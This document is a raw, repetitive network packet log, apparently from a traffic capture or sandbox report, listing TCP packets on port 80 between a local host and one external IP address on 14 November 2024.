                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451834917 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451848030 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451855898 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451863050 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451883078 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451895952 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451911926 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451919079 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451927900 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451946974 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451951027 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451978922 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451987982 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.451993942 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.452009916 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.452024937 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.452039957 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.452040911 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.452055931 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.452064037 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.452095985 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.452253103 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.452269077 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.452284098 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.452296019 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.452305079 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.452312946 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.452328920 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.452339888 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.452341080 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.452346087 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.452362061 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.452406883 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.493254900 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811495066 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811515093 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811536074 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811551094 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811585903 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811599970 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811609983 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811614037 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811614037 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811623096 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811635017 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811645985 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811651945 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811662912 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811676025 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811687946 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811698914 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811707020 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811709881 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811722994 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811733961 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811744928 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811755896 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811757088 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811757088 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811769009 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811810017 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811821938 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811849117 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811856985 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811856985 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811861038 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811875105 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811875105 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811887980 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811898947 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811909914 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811922073 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811948061 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811959028 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811969995 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811969995 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811969995 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811969995 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811981916 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811994076 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.811996937 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812005997 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812016964 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812045097 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812056065 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812067032 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812068939 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812068939 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812068939 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812079906 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812092066 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812102079 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812113047 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812119007 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812119007 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812124968 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812136889 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812149048 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812154055 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812160015 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812161922 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812161922 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812191963 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812202930 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812208891 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812215090 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812223911 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812236071 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812246084 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812256098 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812267065 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812277079 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812282085 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812282085 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812282085 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812289000 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812304020 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812306881 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812330008 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812333107 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812341928 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812352896 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812364101 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812375069 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812381029 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812388897 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812388897 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812390089 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812402010 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812412977 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812422991 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812432051 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812436104 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812444925 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812457085 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812475920 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812478065 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812490940 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812500954 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812505007 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812513113 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812524080 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812532902 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812541962 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812551022 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812560081 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812568903 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812568903 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812570095 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812580109 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812588930 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812616110 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812625885 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812634945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812634945 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812637091 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812644958 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812653065 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812663078 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812675953 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812686920 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812690020 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812696934 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812706947 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812715054 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812725067 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812726974 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812735081 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812745094 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812755108 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812763929 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812766075 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812776089 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812786102 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812794924 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812800884 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812800884 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812804937 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812814951 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812814951 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812824011 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812834024 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812834024 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812843084 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812850952 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812853098 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812860012 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812870026 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812874079 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812880039 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812890053 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812917948 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812917948 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812931061 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812984943 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.812994003 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813002110 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813010931 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813019991 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813024998 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813034058 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813044071 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813052893 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813059092 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813062906 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813072920 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813082933 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813096046 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813096046 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813107014 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813117981 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813127041 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813134909 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813138008 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813147068 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813157082 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813164949 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813167095 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813174963 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813184023 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813193083 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813193083 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813200951 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813209057 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813210011 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813232899 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813237906 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813247919 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813258886 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813270092 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813278913 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813287973 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813288927 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813297987 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813308001 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813313961 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813318014 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813327074 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813337088 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813344955 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813349009 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813354969 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813369036 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813383102 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813388109 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813394070 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813402891 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813402891 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813410997 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813462019 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813472033 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813482046 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813488960 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813488960 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813494921 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813527107 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813535929 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813544989 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813554049 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813563108 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813571930 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813581944 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813580990 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813580990 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813594103 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813605070 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813613892 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813622952 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813632011 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813641071 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813649893 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813659906 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813663006 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813663006 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813663006 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813669920 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813680887 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813689947 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813699961 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813708067 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813718081 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813721895 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.813721895 CET4995780192.168.2.10147.45.47.81
